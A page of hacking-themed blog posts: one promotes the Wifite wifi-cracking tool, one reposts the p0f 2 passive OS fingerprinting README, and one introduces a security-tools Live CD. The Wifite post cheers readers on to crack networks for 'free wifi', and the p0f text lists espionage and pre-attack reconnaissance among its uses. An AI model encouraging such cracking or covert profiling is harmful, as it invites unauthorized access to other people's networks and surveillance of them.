Posts tagged Hacking

We’re back! (with a great wifi cracking tool)

Hello cyber dissidents,

After a long break while some of us pursued personal projects and other forms of activism Anarchy Computer Corp are pleased to announce we are back.

You will notice nothing has changed since our last post so none of the old megaupload links have been updated yet. We had to ‘dispose’ of some of our hard drives so lost some of the software we had but while posting new things over the coming months we will be sorting out the old links, deleting the old megaupload ones and replacing them with new download links where possible or directing you to places we trust where you can find that particular software we once hosted with megaupload.

You can also find us on Twitter: @ANOK_puter_Corp and we also now have a Facebook page here.



So let’s start this new chapter with Wifite, a great, easy to use and fast wifi cracking tool. You can read about it and download it here.


Here’s what they say about it, ‘It’s purpose is to attack multiple WEP, WPA, and WPS encrypted networks in a row. This tool is customizable to be automated with only a few arguments. Wifite aims to be the “set it and forget it” wireless auditing tool’.

We’ve been trying it out over the weekend and have been more than impressed with it and we’re sure you will be too.

Give it a try, you’ve nothing to lose and free wifi to gain!

p0f 2 – passive OS fingerprinting tool

1) What’s this, anyway?
2) Why would I want to use it?
3) What’s new then?
4) Command-line
5) Active service integration
6) SQL database integration
7) Masquerade detection
8) Fingerprinting accuracy and precision
9) Adding signatures
10) Security
11) Limitations
12) Is it better than other software?
13) Program no work!
14) Appendix A: Links to OS fingerprinting resources


1. What’s this, anyway?

The passive OS fingerprinting technique is based on analyzing the
information sent by a remote host while performing usual communication
tasks – such as whenever a remote party visits your webpage, connects to
your MTA – or whenever you connect to a remote system while browsing the
web or performing other routine tasks. In contrast to active fingerprinting
(with tools such as NMAP or Queso), the process of passive fingerprinting
does not generate any additional or unusual traffic, and thus cannot be

Captured packets contain enough information to identify the remote OS,
thanks to subtle differences between TCP/IP stacks, and sometimes certain
implementation flaws that, although harmless, make certain systems quite
unique. Some additional metrics can be used to gather information about
the configuration of a remote system or even its ISP and network setup.

The name of the fingerprinting technique might be somewhat misleading -
although the act of discovery is indeed passive, p0f can be used for
active testing. It is just that you are not required to send any unusual
or undesirable traffic, and can rely what you would be getting from
the remote party anyway, in the course of everyday, seemingly innocuous

To accomplish the job, p0f equips you with four different detection modes:

- Incoming connection fingerprinting (SYN mode, default) – whenever
you want to know what the guy or gal who connects to you runs,

- Outgoing connection (remote party) fingerprinting (SYN+ACK mode) -
to fingerprint systems you or your users connect to,

- Outgoing connection refused (remote party) fingerprinting (RST+ mode)
- to fingerprint systems that reject your traffic,

- Established connection fingerprinting (stray ACK mode) – to examine
existing sessions without any needless interference.

It is quite difficult to pinpoint who came up with this idea of passive
SYN-based OS fingerprinting, though due credit must be given to Craig Smith,
Peter Grundl, Lance Spitzner, Shok, Johan, Su1d, Savage, Fyodor and other
brave hackers who explored this and related topics in the years 1999 and

P0f was the first (and I believe remains the best) fully-fledged
implementation of a set of TCP-related passive fingerprinting techniques.
The current version uses a number of detailed metrics, often invented
specifically for p0f, and achieves a very high level of accuracy and detail;
it is designed for hands-free operation over an extended period of time,
and has a number of features to make it easy to integrate it with other

Portions of this code are used in several IDS systems, some sniffer
software; p0f is also shipped with several operating systems and
incorporated into an interesting OpenBSD pf hack by Mike Frantzen, that
allows you to filter out or redirect traffic based on the source OS.
There is also a beta patch for Linux netfilter, courtesy of Evgeniy
Polyakov. In short, p0f is a rather well-established software at this

2. Why would I want to use it?

Oh, a number of uses come to mind:

- Profiling / espionage – ran on a server, firewall, proxy or router,
p0f can be used to silently gather statistical and profiling information
about your visitors, users, or competitors. P0f also gathers netlink
and distance information suitable for determining remote network
topology, which may serve as a great piece of pre-attack intelligence.

- Active response / policy enforcement – integrated with your server
or firewall, p0f can be used to handle specific OSes in the most
suitable manner and serve most appropriate content; you may also enforce
a specific corporate OS policy, restrict SMTP connections to a set of
systems, etc; with masquerade detection capabilities, p0f can be used
to detect illegal network hook-ups and TOS violations.

- PEN-TEST – in the SYN+ACK, RST+, or stray ACK mode, or when a returning
connection can be triggered on a remote system (HTML-enabled mail with
images, ftp data connection, mail bounce, identd connection, IRC DCC
connection, etc), p0f is an invaluable tool for silent probing of a
subject of such a test.

Masquerade detection in SYN+ACK or RST+ modes can be also used to
test for load balancers and so forth.

- Network troubleshooting – RST+ mode can be used to debug network
connectivity problems you or your visitors encounter.

- Bypassing a firewall – p0f can “see thru” most NAT devices, packet
firewalls, etc. In SYN+ACK mode, it can be used for fingerprinting
over a connection allowed by the firewall, even if other types of
packets are dropped; as such, p0f is the solution when NMAP and
other active tools fail.

- Amusement value is also pretty important. Want to know what this
guy runs? Does he have a DSL, X.25 WAN hookup, or a shoddy SLIP
connection? What’s Google crawlbot’s uptime?

Of course, “a successful [software] tool is one that was used to do
something undreamed of by its author” ;-)

3. What’s new then?

The original version of p0f was written somewhere in 2000 by Michal
Zalewski (that be me), and later taken over William Stearns (circa 2001).
The original author still contributed to the code from time to time, and
the version you’re holding right now is his sole fault – although I’d like
William to take over further maintenance, if he’s interested.

Version 2 is a complete rewrite of the original v1 code. The main reason
for this is to make signatures more flexible, and to implement certain
additional checks for very subtle packet characteristics to improve
fingerprint accuracy. Changes include:


- Option layout and count check,
- EOL presence and trailing option data [*],
- Unrecognized option handling (TTCP, etc),
- WSS to MSS/MTU correlation checks [*],
- Zero timestamp check,
- Non-zero ACK in initial SYN [*],
- Non-zero “unused” TCP fields [*],
- Non-zero urgent pointer in SYN [*],
- Non-zero second timestamp [*],
- Zero IP ID in initial packet,
- Unusual auxiliary flags,
- Data payload in control packets [*],
- SEQ number equal to ACK number [*],
- Zero SEQ number [*],
- Non-empty IP options.

[*] denotes metrics “invented” for p0f, as far as I am concerned. Other
metrics were discussed by certain researchers before, although usually
not implemented anywhere. A detailed discussion of all checks performed
by p0f can be found in the introductory comments in p0f.fp, p0fa.fp
and p0fr.fp.

As a matter of fact, some of the metrics were so precise I managed
to find several previously unknown TCP/IP stack bugs :-) See
doc/win-memleak.txt and p0fr.fp for more information.


- Major performance boost – no more runtime signature parsing, added
BPF pre-filtering, signature hash lookups. All this to make p0f
suitable for being run on high-throughput devices,

- Advanced masquerade detection for policy enforcement (ISPs,
corporate networks),

- Modulo and wildcard operators for certain TCP/IP parameters to make
it easier to come up with generic last chance signatures for
systems that tweak settings notoriously (think Windows),

- Auto-detection of DF-zeroing firewalls,

- Auto-detection of MSS-tweaking NAT and router devices,

- Media type detection based on MSS, with a database of common
link types,

- Origin network detection based on unusual ToS / precedence bits,

- Ability to detect and skip ECN option when examining flags,

- Better fingerprint file structure and contents – all fingerprints
are rigorously reviewed before being added.

- Generic last-chance signatures to cover general OS characteristics,

- Query mode to enable easy integration with third party software -
p0f caches recent fingerprints and answer queries for src-dst
combinations on a local stream socket in a easy to parse

- Usability features: greppable output option, daemon mode, host
name resolution option, promiscuous mode switch, built-in signature
collision detector, ToS reporting, full packet dumps, pcap dump
output, etc,

- Brand new SYN+ACK, RST+ and stray ACK fingerprinting modes for silent
identifications of systems you connect to the usual way (web
browser, MTA), or even systems you cannot connect to at all;
now also with RST+ACK flag and value validator.

- Fixed WSCALE handling in general, and WSS passing on little-endian,
many other bug-fixes and improvements of the packet parser
(including some sanity checks).

- Fuzzy checks option when no precise matches are found (limited).

- VLAN support.

Sadly, this will break all compatibility with v1 signatures, but it’s
well worth it.

4. Command-line

P0f is rather easy to use. There’s a number of options, but you don’t
need to know most of them for normal operation:

p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -Q socket [ -0 ] ]
[ -w file ] [ -u user ] [ -c size ] [ -T nn ] [ -e nn ]
[ -FNODVUKAXMqxtpdlRL ] [ 'filter rule' ]

-f file – read fingerprints from file; by default, p0f reads signatures
from ./p0f.fp or /etc/p0f/p0f.fp (the latter on Unix systems
only). You can use this to load custom fingerprint data.
Specifying multiple -f values will NOT combine several signature
files together.

-i device – listen on this device; p0f defaults to whatever device libpcap
considers to be the best (and which often isn’t). On some newer
systems you might be able to specify ‘any’ to listen on all
devices, but don’t rely on this. Specifying multiple -i values
will NOT cause p0f to listen on several interfaces at once.

-s file – read packets from tcpdump snapshot; this is an alternate
mode of operation, in which p0f reads packet from pcap
data capture file, instead of a live network. Useful for
forensics (this will parse tcpdump -w output, for example).

You can use Ethereal’s text2pcap to convert human-readable
packet traces to pcap files, if needed.

-w file – writes matching packets to a tcpdump snapshot, in addition to
fingerprinting; useful when it is advisable to save copies of
the actual traffic for review.

-o file – write to this logfile. This option is required for -d and
implies -t.

-Q socket – listen on a specified local stream socket (a filesystem object,
for example /var/run/p0f-sock) for queries. One can later send a
packet to this socket with p0f_query structure from p0f-query.h,
and wait for p0f_response. This is a method of integrating p0f
with active services (web server or web scripts, etc). P0f will
still continue to report signatures the usual way – but you can
use -qKU combination to suppress this. Also see -c notes.

A sample query tool (p0fq) is provided in the test/
subdirectory. There is also a trivial perl implementation of
a client available; finally, test/p0fping.c can be used to
check the status of the socket prior to queries.

NOTE: The socket will be created with permissions corresponding
to your current umask. If you want to restrict access to this
interface, use caution.

This option is currently Unix-only.

-0 (In conjunction with -Q) Treat source port 0 in queries as
a wildcard. This is useful when p0f query is constructed
from within a plugin to a program that does not provide
source port information (this holds true for some mail
filters, etc).

Note that some ambiguity is introduced: the response might
not refer to the exact connection the plugin is handling,
which may (seldom) cause misidentification of NATed hosts.

-e ms – packet capture window. On some systems (particularly on older Suns),
the default pcap capture window of 1 ms is insufficient, and p0f
may get no packets. In such a case, adjust this parameter to the
smallest value that results in reliable operation (note that this
might introduce some latency to p0f).

-c size – cache size for -Q and -M options. The default is 128, which
is sane for a system under a moderate network load. Setting it
too high will slow down p0f and may result in some -M false
positives for dial-up nodes, dual-boot systems, etc. Setting it
too low will result in cache misses for -Q option. To choose the
right value, use the number of connections on average per the
interval of time you want to cache, then pass it to p0f with -c.

P0f, when run without -q, also reports average packet ratio
on exit. You can use this to determine the optimal -c setting.

This option has no effect if you do not use -Q nor -M.

-u user – this option forces p0f to chroot to this user’s home directory
after reading configuration data and binding to sockets, then to
switch to his UID, GID and supplementary groups.

This is a security feature for the paranoid – when running
p0f in daemon mode, you might want to create a new
unprivileged user with an empty home directory, and limit the
exposure when p0f is compromised. That said, should such a
compromise occur, the attacker will still have a socket he can
use for sniffing some network traffic (better than rm -rf /).

This option is Unix-only.

-N – inhibit guesswork; do not report distances and link media. With
this option, p0f logs only source IP and OS data.

-F – deploy fuzzy matching algorithm if no precise matches are
found (currently applies to TTL only). This option is not
recommended for RST+ mode.

-D – do not report OS details (just genre). This option is useful
if you don’t want p0f to elaborate on OS versions and such
(combine with -N).

-U – do not display unknown signatures. Use this option if you want
to keep your log file clean and are not interested in hosts that
are not recognized.

-K – do not display known signatures. This option is useful when you
run p0f recreationally and want to spot UFOs, or in -Q or -M
modes when combined with -U to inhibit all output.

-q – be quiet – do not display banners and keep low profile.

-p – switch card to promiscuous mode; by default, p0f listens
only to packets addressed or routed thru the machine it
runs on. This setting might decrease performance, depending
on your network design and load. On switched networks,
this usually has little or no effect.

Note that promiscuous mode on IP-enabled interfaces can be
detected remotely, and is sometimes not welcome by network

-t – add human-readable timestamps to every entry (use multiple
times to change date format, a la tcpdump).

-d – go into daemon mode (detach from current terminal and fork into
background). Requires -o.

-l – outputs data in line-per-record style (easier to grep).

-A – a semi-supported option for SYN+ACK mode. This option will cause
p0f to fingerprint systems you connect to, as opposed to systems
that connect to you (default). With this option, p0f will look
for p0fa.fp file instead of the usual p0f.fp. The usual config
is NOT SUITABLE for this mode.

The SYN+ACK signature database is sort of small at the moment,
but suitable for many uses. Feel free to contribute.

-R – a barely-supported option for RST+ mode. This option will
prompt p0f to fingerprint several different types of traffic,
most importantly “connection refused” and “timeout” messages.

This mode is similar to SYN+ACK (-A), except that the program
will now look for p0fr.fp. The usual config is NOT SUITABLE for
this mode. You may have to familiarize yourself with p0fr.fp
before using it.

-O – absolutely experimental open connection (stray ACK)
fingerprinting mode. In this mode, p0f will attempt to
indiscriminately identify OS on all packets within an already
established connection.

The only use of this mode is to perform an immediate
fingerprinting of an existing session. Because of the sheer
amount of output, you are advised against running p0f in this
mode for extended periods of time.

The program will use p0fo.fp file to read fingerprints. The
usual config is NOT SUITABLE for this mode. Do not use unless
you know what you are doing. NOTE: The p0fo.fp database is very
sparsely populated at the moment.

-r – resolve host names; this mode is MUCH slower and poses some
security risk. Do not use except for interactive runs or
low traffic situations. NOTE: the option ONLY resolves
IP address into a name, and does not perform any checks for
matching reverse DNS. Hence, the name may be spoofed – do not
rely on it without checking twice.

-C – perform collision check on signatures prior to running. This
is an essential option whenever you add new signatures to
.fp files, but is not necessary otherwise.

-L – list all network interfaces. This option is Windows-only.

-x – dump full packet contents; this option is not compatible with
-l and is intended for debugging and packet comparison only.

-X – display packet payload; rarely, control packets we examine
may carry a payload. This is a bug for the default (SYN)
and -A (SYN+ACK) modes, but is (sometimes) acceptable in
-R (RST+) mode.

-M – deploy masquerade detection algorithm. The algorithm looks over
recent (cached) hits and looks for indications of multiple
systems being behind a single gateway. This is useful on routers
and such to detect policy violations. Note that this mode is
somewhat slower due to caching and lookups. Use with caution
(or do not use at all) in modes other than default (SYN).

-T nn – masquerade detection threshold; only meaningful with -M,
sets the threshold for masquerade reporting.

-V – use verbose masquerade detection reporting. This option
describes the status of all indicators, not only an overall

-v – enable support for 802.1Q VLAN tagged frames. Available on
some interfaces, on other, will result in BPF error.

The last part, ‘filter rule’, is a bpf-style filter expression for
incoming packets. It is very useful for excluding or including certain
networks, hosts, or specific packets, in the logfile. See man tcpdump for
more information, few examples:

‘src port ftp-data’
‘not dst net mask′
‘dst port 80 and ( src host or src host )’

The baseline rule is to select only TCP packets with SYN set, no RST, no
ACK, no FIN (SYN, ACK, no RST, no FIN for -A mode; RST, no FIN, no SYN
for -R mode; ACK, no SYN, no RST, no FIN for stray ACK mode). You cannot
make the rule any broader (without cheating ;), the optional filter
expression can only narrow it down.

You can also use a companion log report utility for p0f. Simply run
‘p0frep’ for help.

5. Active service integration

In some cases, you want to feed the p0f output to a specific application to
take certain active measures based on the operating system (handle specific
visitors differently, block some unwanted OSes, optimize the content served).

As mentioned earlier, OpenBSD users can simply use the pf OS fingerprinting
implementation, a cool functionality coded by Mike Frantzen and based on
p0f methodology and signature database. This software allows them to
redirect or block OSes any way they want. Linux netfilter users can also
check out patches by Evgeniy Polyakov to get roughly the same stuff.

In other setups, or if you do not feel like fiddling with the kernel,
you want to use the -Q option, and then query p0f by connecting to a
specific local stream socket and sending a single packet with p0f_query
struct (p0f-query.h), and receiving p0f_response. P0f, when running in -Q
mode, will cache a number of last OS matches, and when queried for a
specified host and port combination, will return what it detected.
Check test/p0fq.c for a clean example.

The query structure (p0f_query) has the following fields (all
values, addresses and port numbers are in machine’s native endian):

magic - must be set to QUERY_MAGIC,
id - query ID, copied literally to the response,
type – query type (must be QTYPE_FINGERPRINT)
src_ad - source address,
dst_ad - destination address,
src_port - source port,
dst_port - destination port.

The response (p0f_response) is as follows:

magic - must be set to QUERY_MAGIC,
id - copied from the query,
type - RESP_OK, RESP_BADQUERY (error), RESP_NOMATCH (cache miss),
genre[20] - OS genre, zero length if no match,
detail[40] - OS version, zero length if no match,
dist - distance, -1 if unknown,
link[30] - link type description, zero length if unknown,
tos[30] - ToS information, zero length if unknown,
fw,nat - firewall and NAT flags, if spotted,
real - “real” OS versus userland stack,
score - masquerade score (or NO_SCORE), see next section,
mflags - exact masquerade flags (D_*), see next section.

There’s also a special type of queries, where type = QTYPE_STATUS,
and subsequent fields are irrelevant (should be zero); this returns
a different structure:

magic - must be set to QUERY_MAGIC,
id - copied from the query
type - must be set to RESP_STATUS (or RESP_BADQUERY on error)
version[16] - p0f version
mode - p0f mode (ASCII character, same as in command-line options)
fp_cksum - checksum of the fingerprint file for versioning purposes
cache - cache size
packets - total number of packets analyzed
matched - total number of OSes recognized
queries - total number of queries handled
cmisses – cache misses (for cache size debugging)
uptime - process uptime in seconds

The connection is one-shot. Always send the query and recv the
response immediately after connect – p0f handles the connection in
a single thread, and you are blocking other applications (until
timeout, that is, the timeout is defined as two seconds in config.h).

As of today, there is no way to integrate p0f with other programs
as a packet-parsing library. It would be trivial to implement this,
but there are no volunteers at the moment :-)

6. SQL database integration

At the very moment, p0f does not feature built-in database connectivity,
although I am looking for a willing contributor to take care of it.
In the meantime, however, you may use p0f_db utility authored by
Nerijus Krukauskas:

Jonas Eckerman has some tools to make it easier to move p0f output
from one system to another, and then to run basic visualization:

7. Masquerade detection

Masquerade detection (-M) works by looking at the following factors for
all known signatures that belong to real operating systems (and not
userland tools such as scanners):

- Differences in OS fingerprints for the same IP:
-3 if the same OS
+4 if different signature for the same OS genre
+6 if different OS genres

- NAT and firewall flags set:
+4 if NAT flags differ for the same signature
+4 if fw flags differ for the same signature
+1 per each NAT and fw flag if signatures differ (max. 4)

- Link type differences:
+4 if media type differs

- Distance differences:
+1 if host distance differs

- Timestamp scoring, if timestamps available:
-1 if timestamp delta within MAX_TIMEDIF (config.h)
+1 if timestamp delta past MAX_TIMEDIF
+2 if timestamp delta negative (!)

- Time from the previous occurrence:
/2 if more than half the cache size to the previous occurrence

The final score is reported as score * 200 / 25 (25 being the highest
score possible) and reported as a percentage.

The higher the value, the more likely the result is accurate. Since
the situation when all indicators are up is rather unrealistic, the
multiplier is 200, not 100, and you can get over 100% match ;-)
Everything above 0% should be looked at, over 20% is usually a sure

You can configure the reporting of matches by setting the threshold
to a value different than zero with -T switch. -T 10 might be a good
idea. If you’re looking at a local network, you can define
DIST_EXTRASCORE to score distance differences much higher – it is
unlikely for a local LAN to shrink or grow, but it’s not uncommon for
routing over the Internet to change. If you are unhappy with the
scoring algorithm and do not want to modify the sources, you can use
-V option to report the status of every masquerade indicator. In
conjunction with -l, -V can be used to grep for the precise set
of signatures you’re interested in.

Every hit is prefixed with “>> “. Combine -M, -K and -U to report
masquerade hits only (but it is recommended to still dump packets
with -w to be able to examine the evidence later on). A good

p0f -M -K -U -w evidence.bin -c 500 -l -V ‘not src host my_ip’

A quick demo: – OpenBSD 3.0-3.4 (up: 836 hrs)
-> (distance 6, link: GPRS or FreeS/WAN) – Linux 2.4/2.6 (NAT!) (up: 173 hrs)
-> (distance 6, link: GPRS or FreeS/WAN) – Windows XP Pro SP1, 2000 SP3 (NAT!)
-> (distance 6, link: GPRS or FreeS/WAN)

>> Masquerade at indicators at 69%.

That was quite evident. – Windows 2000 SP2+, XP SP1
-> (distance 10, link: ethernet/modem) – Windows 2000 SP4, XP SP1, patched 98
-> (distance 12, link: ethernet/modem)

>> Masquerade at indicators at 43%.

The host has a name of, so once again, a good hit.

Verbose output looks like this:

>> Masquerade at indicators at 26%.
Flags: OS -far

In this case, we have two different OSes (OS), but the time between two
occurrences is long enough to lower the score (-far). All -V flags are:

OS - different OS genres
VER - different OS versions
LINK - link type difference
DIST - distance differences
xNAT - NAT flags differ (same OS match)
xFW - FW flags differ (same OS match)
NAT1, NAT2 – NAT flags set (different OSes)
FW1, FW2 - FW flags set (different OSes)
FAST - timestamp delta too high
TNEG – timestamp delta negative
-time - timestamp delta within the norm
-far - distant occurrences

Because the score is cumulative, it is possible to have mutually exclusive
flags set (e.g xNAT and NAT1) whenever more than two signatures were taken
into account when calculating the score.

Masquerade status and flags can be also retrieved via the query interface,
as noted in the section above.

The functionality depends on keeping the fingerprint database clean and
prefixing non-OS fingerprints (nmap, other scanner tools,
application-induced TCP/IP stack behavior) with – prefix. Those
fingerprints, as well as all the UNKNOWNs, are not used for masquerade

Note that a single host can be reported many times. The system reports
immediately, but later on, the host might score higher once new data
arrives, and p0f will post a “correction” with a new, higher ranking.
Use the highest result for a specific host, but also observe the
consistency of subsequent results.

The solution uses a cyclic buffer also used in -Q mode (and affected by
-c parameter). You should set the value to cache not more than an
hour of traffic (and no less than a minute). Calculate the number of
connections on average per the interval of time you wish to cache,
then pass the value to p0f with -c.

Setting -c too high will result in false positives for dial-up nodes or
multiboot systems (of course, you sometimes want to detect the latter,
too). Setting it too low may miss some cases.

The code detects NAT devices that do not rewrite packets (almost
all packet firewalls). Ones that do rewrite packets (proxy firewalls)
can, on the other hand, be detected by their own signatures.

Masquerade detection will fail if all systems masqueraded have an
identical configuration and network setup, uptimes and network usage
(which is very unlikely, even in a homogeneous environment). A
prerequisite for detection is that the systems are used at (roughly) the
same time, within the cache time frame.

NOTE: The detector is most reliable and sensitive in the default (SYN) mode,
and scores are adjusted to work well there; in other fingerprinting modes,
your mileage may vary. You can try to combine -M with -A (masquerade
detection on systems you connect to), which is only really useful for
detecting load balancers and other setups that map a single address to
several servers; or with -R, which can be used both for detecting load
balancers (RST) and normal incoming masquerade detection (RST+ACK),
although it’s naturally less reliable and sensitive. Using -M with -O is
weird, but regrettably not prosecuted.

8. Fingerprinting accuracy and precision

Version 2 uses some more interesting TCP/IP packet metrics, and should
be inherently more accurate and precise. We also try to use common sense
when adding and importing signatures, which should be a great
reliability boost. More obscure modes, such as RST+ or stray ACK, may
and will be inherently less accurate or reliable – see section 10 for
more details – but are still far more sane than p0f v1.

Link type identification is not particularly reliable, as some users tend
to mess with their default MTUs for better (or worse ;-) performance.
For most systems, it will be accurate, but if you see an unlikely value
reported, just deal with it.

Uptime detection is also of an amusement value. Some newly released
systems tend to multiply timestamp data by 10 or have other clocking
algorithms. The current version of p0f does not support those differences
over the entire database. I will try to fix it, until then, those boxes
would have an artificially high uptime.

NAT detection is merely an indication of MSS being tweaked at some point.
Most likely, the reason for this is indeed a NATing router, but there
are some other explanations. Linux, for example, tends to mix up MTUs
from different interfaces in certain scenarios (when, I’m not sure, but
it’s common and is probably a bug), and if you see a Linux box tagged as
“NAT”, it does not have to be NATed – it might simply have two network
interfaces. P0f can still be a useful NAT detection tool (you can examine
changing distances and OS matches for a specific host, too), simply don’t
rely on this flag alone.

If you see link type identified as unknown-XXXX, try to Google for
“mtu XXXX”. If you find something reasonable, you might want update
mtu.h and recompile p0f, and submit this information to me. Keep in
mind some MTU settings are just arbitrary and do not have to mean a

P0f also tries to recognize some less popular combinations of precedence
bits, type of service and so-called “must be zero” bit in TCP headers to
detect certain origin ISPs. Many DSL and cable operators, particularly
in Europe, tend to configure their routers in fairly unique ways in
this regard. This, again, is purely of an amusement value. See tos.h
for more information.

P0f will never be as precise as NMAP, simply because it has to rely
on what the host sends by itself, and can’t check how it responds to
“invalid” or tweaked packets. On the other hand, in the times of
omnipresent personal and not quite personal firewalls and such,
p0f can often help where NMAP is confused.

Just like with any fingerprinting utility, active or passive, it is
possible to change TCP/IP stack settings to either avoid identification,
or appear as some other system – although some of the changes might
require kernel-space hacking. There are no publicly available
anti-p0f tools yet, although I expect them to appear at some point.

9. Adding signatures

To avoid decreasing reliability of the database, you MUST read the
information provided at the beginning of p0f.fp carefully before touching
it in any way! If you are fiddling with p0fa.fp, p0fr.fp or p0fo.fp, read
all comments in those files IN ADDITION to the contents of p0f.fp. Those
files provide a good technical primer, and document the format and
subtleties of all the fingerprints.

If you stumble upon a new signature, do consider submitting it to,, or connecting from the system to We will be happy to incorporate
this signature in the official release, and can help you make your
signature more accurate. The least popular the system is, the more valuable
the signature; we have the mainstream covered quite well.

Be sure to run p0f -C after making any additions. This will run a collision
checker and warn about shadowed or possibly incorrect signatures. This
happens more often than you’d think. The same applies to p0fa.fp, p0fr.fp
and p0fo.fp files. You need to run p0f -A -C, p0f -R -C or p0f -O -C to
verify their contents.

Rest assured, you will sooner or later find something really surprising. You
can look at tmp/ to see a current list of mysteries I’ve stumbled upon. The
museum at lists some other funky cases.
By all means, I’d like to hear about other UFO sightings!

10. Security

Running p0f as a daemon should pose a fairly low risk, compared to tcpdump
or other elaborate packet parsers (Ettercap, Ethereal, etc). P0f does not
attempt anything stupid, such as parsing tricky high-level protocols. There
is a slight risk I screwed up something with the option parser or such, but
this code should be very easy to audit. If you do not feel too comfortable,
you can always use the -u option, which should mitigate the risk.

General security precautions for operating p0f:

- Do not make p0f setuid, setgid or otherwise privileged when the caller
isn’t. Running it via sudo for users you do not trust entirely is also a
so-so idea.

- Do not use -r option unless absolutely necessary, and only for short
and supervised runs. The option introduces a bloated, potentially flawed
libc DNS handling code, and has a DoS potential.

- When running in -Q mode, you need to make sure, either by setting umask or
calling chmod/chown after launching p0f, to set correct permissions on the
query socket – that is, unless you don’t see a problem with your users
querying p0f, which isn’t a great threat to the humanity.

- Do not use world-writable directories for keeping the socket. Do not
use world-writable directories for output files or configuration. Come
to think about it, don’t use world-writable directories for any purpose.

- Don’t panic.

11. Limitations

There are several generic and some specific limitations as to what
passive fingerprinting and p0f can achieve.

Proxy firewalls and other high-level proxy devices are not transparent
to any TCP-level fingerprinting software. The device itself will be
fingerprinted, not actual source hosts. There is some software that
lets you perform application fingerprinting, this isn’t it.

Some packet firewalls configured to normalize outgoing traffic (OpenBSD pf
with “scrub” enabled, for example) will, well, normalize packets. Those
signatures will not correspond to the originating system, and probably not
quite to the firewall either. Checkpoint firewall, in a fairly lame attempt
to defeat OS fingerprinting, tweaks IP ID and TTL on outgoing packets; if
you want to work around this problem, run p0f with -F option.

In default mode, in order to obtain the information required for
fingerprinting, you have to receive at least one SYN packet initiating a
TCP connection to your machine or network. Note: you don’t have to respond
to this particular SYN, and it’s perfectly fine to respond with RST.
For SYN+ACK fingerprinting, you must be able to connect to at least one
open port on the target machine to actually get SYN+ACK packet. You
do not need any other ports, or the ability to send awkward, multiple
or otherwise suspicious packets to the remote host (unlike with NMAP).
Also note that SYN+ACK fingerprints are somewhat affected by the initial
SYN on some systems.

If you cannot establish a connection, but the remote party at least
sends you RST+ACK back (“Connection refused”), you can use RST+ mode of
p0f (-R option), but be aware this mode is inherently less accurate
and reliable, mostly because systems usually don’t bother with
putting any options in those packets, and they all look very similar.

SYN+ACK fingerprinting is considered (by me) to be less accurate and
sometimes dependent on the system that initiates the connection. Same goes
for (again, experimental!) stray ACK fingerprinting. RST+ fingerprinting
mode, on the other hand, is fairly reliable, but far less precise.
This is why I put stress on developing the SYN fingerprinting capability -
but SYN+ACK, RST+ and stray ACK database contributions and tricks are
of course very welcome.

Fingerprinting on a fully established (existing) TCP connection is now
supported by p0f (since version 2.0.5), but the database contains very
few entries, and the accuracy and applicability of this mode is not yet
well established. Be prepared for this mode to produce excessive amounts
of logs.

What I’ll be trying to do is to integrate a number of fingerprinting
techniques, currently completely separate (SYN, SYN+ACK, ACK, FIN,
RST, retransmission timing, etc) into a single solution for very
high accuracy. But this is perhaps p0f 3.0.

12. Is it better than other software?

Depends on what you need. As I said before, p0f is fast, lightweight,
low-profile. It can be integrated with other services. It has a clean and
simple code, runs as a single thread and uses very little CPU power, works
on a number of systems (Linux, BSD, Solaris and probably others), has a
pretty detailed and accurate fingerprint database. Quite frankly, I
doubt there is a program that offers better overall functionality or
accuracy when it comes to passive fingerprinting, but I would not be
surprised to be proved wrong one day. In other words, feel free to
explore alternatives.

Of the ones I know… is it better than Siphon? Yes. Ettercap? Yes,
version 2 is better than v1-derived fingerprinting in Ettercap. Besides,
it’s simply different, and intended for a different range of applications.

Version 1 of p0f did implement many novel fingerprinting metrics that were
later incorporated in other software, but so did version 2 – and others are
yet to catch up.

As to other “current” utilities, you can use masqdet by Wojtek Kaniewski
as an alternative to p0f -M mode. On the web, you can also stumble upon
“n0t” and “natdet” utilities authored by a guy going by the nickname
r3b00t, but these are just dumbed-down and inherently less reliable rip-offs
closely inspired on p0f code. Your mileage may vary, but I recommend
you to avoid them: they won’t work any better.

13. Program no work!

Whoops. We apologize. P0f requires the following to compile and
run fine:

- libpcap 0.4 or newer
- GNU C Compiler 2.7.x or newer
- GNU make 3.7x or newer, or BSD make
- GNU bash / awk / grep / sed / textutils (for p0frep only)

For the Windows port requirements and instructions, please read
INSTALL.Win32 file.

Not every platform is supported by p0f, and compilation problems do
happen. Please let us know if you have any problems (or, better yet,
managed to find a solution).

If you find a system that is either not recognized, or is fingerprinted
incorrectly, please do not downplay this and let us know.

Platforms known to be working fine (regression tests not done on
a regular basis, though):

- NetBSD
- FreeBSD
- OpenBSD
- MacOS X
- Linux (2.0 and up)
- Solaris (2.6 and up)
- Windows (see INSTALL.Win32)
- AIX (you need precompiled BULL libpcap)

If p0f compiles and runs, but displays “unknown datalink” or
“bad header_len” warnings, it is likely that your network interface type
is not (yet) recognized. Let us know, it is easy to fix that once and
for all users.

14. Links to OS fingerprinting resources

Recommended RFC reading: – TCP/IP specification – TCP/IP tutorial – performance extensions – T/TCP extensions – TCP/IP selective ACK

Practical information:

Active ICMP fingerprinting:

Passive OS fingerprinting basics:

THC Amap, application fingerprinting:

Hmap, web server fingerprinting:

Fyodor’s NMAP, the active fingerprinter:

User-Agent information:

Ident fingerprinting:

Other free tools known to have passive OS fingerprinting:

P0f-based: – Ettercap (p0f v1) – Prelude IDS (p0f v1) – OpenBSD pf (p0f v2.0.1) – Linux netfilter (p0f v2.0) – Vern Paxson’s / Holger Dreger’s NIDS (p0f v2.0) – n0t and natdet (ripped off, AFAICT)

Independent codebase: – pfprintd – Siphon (very out of date) (Siphon w/GUI) – masqdet (NAT detection only)

STD 0.1 – security tools distribution

I found this Knoppix distro while on of my many ‘cyber strolls’ the other night and I was impressed, so much so I thought I’d share it with you straight away before I’ve really given a proper testing. It’s comparable I guess to Backtrack in that it’s chock full of useful tools and is a Live CD but the main difference is it’s based on Knoppix rather than Ubuntu like the Backtrack distros. I’m not sure if it’s installable like Backtrack yet as like I say I haven’t actually given it run yet, but I find Live CD’s are easy to run from an ISO on a virtual machine if you want it handy and ready 24/7, this method also has the advantage that you can use it alongside your main distro.

Anyway here’s a quick run down of STD 0.1.




STD is a Linux-based Security Tool. Actually, it is a collection of hundreds if not thousands of open source security tools. It’s a Live Linux Distro, which means it runs from a bootable CD in memory without changing the native operating system of the host computer. Its sole purpose in life is to put as many security tools at your disposal with as slick an interface as it can.


